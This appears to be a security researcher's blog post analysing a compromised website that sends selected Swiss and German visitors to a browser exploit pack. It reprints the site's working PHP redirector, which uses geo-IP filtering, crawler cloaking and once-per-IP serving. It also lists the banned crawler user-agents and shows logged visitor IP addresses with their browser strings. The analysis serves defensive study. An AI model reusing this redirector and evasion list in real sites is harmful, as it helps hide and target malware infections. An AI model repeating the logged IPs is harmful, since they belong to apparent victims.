It is a wide-known fact that the majority of infectious code (iframe redirecting to browser exploit packs) is hosted on free domains or compromised websites that are sold in the underground community. In my earlier presentation at Virus Bulletin Conference (HERE), I discussed about the IP Address Logging Detection Trick (IPLDT) which basically allows the attackers to restrict the spreading of malware to a dedicated audience on the Internet. For more about BEPs, read the previous research papers:
- Styx Exploit Pack - http://secniche.org/released/VB_Styx_Exploit_Pack.pdf
- Sweet Orange Exploit Pack - http://secniche.org/released/VB_SWEET_ORANGE_EXP_AKS_RB_RJE.pdf
A simple work flow is discussed below:
- User visits the website serving infectious code.
- Infected website triggers the custom code hosted by attacker to check for the following:
- Geo-location of the IP address: If Geo-location of the IP address of the end-user is found to be mapped to specific locations in the configuration file, the user's browser is redirected to BEP for exploitation.
- Verifying whether the exploit-code has been served to this IP or not: If the database shows that IP has been served already, IP address of the end-user is filtered and BEP URL is not served.
- When the user browser lands on the BEP URL, a specific vulnerability in the browser (built-in components or plug-ins) is exploited to download malware.
In addition, filters are also added for various automated spiders to restrict the access to bots (spiders) to prevent the appearance of malicious website or links in the search results. Recently, I was analyzing a malicious website that was serving infectious code and redirects the user's browser to BEP to download malware by exploiting specific vulnerability. However, the name of the exploit kit is not known. This analysis is more concentrated on the compromised website that performs redirection of the user's browser to the BEP.
A code snippet extracted from the infected webite is presented below. It clearly shows that the user-agent and IP Geo-location("CH" = Switzerland, "DE" = Germany) components are used for setting filters on the incoming HTTP traffic. Additionally, two files are generated for building databases for the IP addresses that are either successful (sbase.txt) or unsuccessful (sbase_bad.txt) in getting the direct link of the BEP URL from the infected website.
A code snippet extracted from the infected webite is presented below. It clearly shows that the user-agent and IP Geo-location("CH" = Switzerland, "DE" = Germany) components are used for setting filters on the incoming HTTP traffic. Additionally, two files are generated for building databases for the IP addresses that are either successful (sbase.txt) or unsuccessful (sbase_bad.txt) in getting the direct link of the BEP URL from the infected website.
<?php
error_reporting(0); ini_set('display_errors',0);
function is_bot($myuagent, $myip) {
$uagents = file('uagents.txt',FILE_IGNORE_NEW_LINES);
$ips = file('ips.txt',FILE_IGNORE_NEW_LINES);
foreach ($uagents as $exp) {
if (preg_match('/'.$exp.'/i',$myuagent)) {
return true;
}
}
foreach ($ips as $exp) {
if (preg_match('/'.$exp.'/',$myip)) {
return true;
}
}
return false;
}
$countries = "CH;DE";
// no?aie?ea n nieiaoii
$good_link = "./banner.php";
// eaaay no?aie?ea
$bad_link = "./blabla.php";
//
$ip = $_SERVER['REMOTE_ADDR'];
$ua = $_SERVER['HTTP_USER_AGENT'];
$file = fopen("./sbase.txt","a+");
$file2 = fopen("./sbase_bad.txt","a+");
$already_showed = FALSE;
while (!feof($file)) {
$buffer = fgets($file);
$ip2 = $ip."\r\n";
if(strcmp($buffer,$ip2)==0) $already_showed = TRUE;
}
if (is_bot($_REQUEST['useragent'], $ip)) $already_showed = TRUE;
if($already_showed) {
include($bad_link);
} else {
require_once('./geoip/geoip.inc');
$gi = geoip_open("./geoip/GeoIP.dat",GEOIP_STANDARD);
$ccode = explode(";",$countries);
$show = FALSE;
foreach($ccode as $value) {
if(geoip_country_code_by_addr($gi,$ip) == $value && preg_match('/(msie|opera|firef)/i', $ua)) {
$show = TRUE;
fwrite($file,$ip."\r\n");
}
}
geoip_close($gi);
if($show) {
include($good_link);
} else {
fwrite($file2,$ip."|".$ua."\r\n");
include($bad_link);
}
}
fclose($file);
?> On checking the stats of the two files, following stats were gathered:
- Approximately 5881 unique IP addresses (users' browsers) were successfully redirected to the BEP.
- Approximately 15737 unique IP addresses (users' browsers) were restricted from visiting to the BEP.
The list of banned user-agents are shown below:
Ask\s*Jeeves
HP\s*Web\s*PrintSmart
HTTrack
IDBot
Indy\s*Library#
ListChecker
MSIECrawler
NetCache
Nutch
RPT-HTTPClient
rulinki\.ru
Twiceler
WebAlta
Webster\s*Pro
www\.cys\.ru
Wysigot
Yahoo!\s*Slurp
Yeti
Accoona
CazoodleBot
CFNetwork
ConveraCrawlerDISCo
Download\s*Master
FAST\s*MetaWeb\s*Crawler
Flexum\s*spider
Gigabot
HTMLParser
ia_archiver
ichiro
IRLbot
Java
km\.ru\s*bot
kmSearchBot
libwww-perl
Lupa\.ru
LWP::Simple
lwp-trivial
Missigua
MJ12bot
msnbot
msnbot-media
Offline\s*Explorer
OmniExplorer_Bot
PEAR
psbot
Python
rulinki\.ru
SMILE
Speedy
Teleport\s*Pro
TurtleScanner
User-Agent
voyager
Webalta
WebCopier
WebData
WebZIP
Wget
Yandex
Yanga
Yeti
msnbot
spider
yahoo
jeeves
google
altavista
scooter
av\s*fetch
asterias
spiderthread revision
sqworm
ask
lycos.spider
infoseek sidewinder
ultraseek
polybot
webcrawler
robozill
gulliver
architextspider
yahoo!\s*slurp
charlotte
ngb
77.120.162.20|Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.16
77.56.219.66|Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
194.124.140.39|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
41.249.252.199|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
213.14.101.210|Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
46.126.65.93|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
194.179.92.135|Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0
213.14.101.210|Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
93.199.31.78|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; tb-webde/2.6.0; rv:11.0) like Gecko
77.56.219.66|Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
188.63.105.11|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
77.56.219.66|Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
84.253.30.110|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
194.179.92.135|Mozilla/4.0 (compatible;)
189.19.165.228|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
66.102.6.183|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.68 Safari/537.36
66.249.93.223|Mozilla/5.0 (en-us) AppleWebKit/534.14 (KHTML, like Gecko; Google Wireless Transcoder) Chrome/9.0.597 Safari/534.14
81.62.35.97|Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
195.78.246.18|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Inference: BEPs extensively use IPLDT to manage the infections and make the malicious code to be served to dedicated countries.
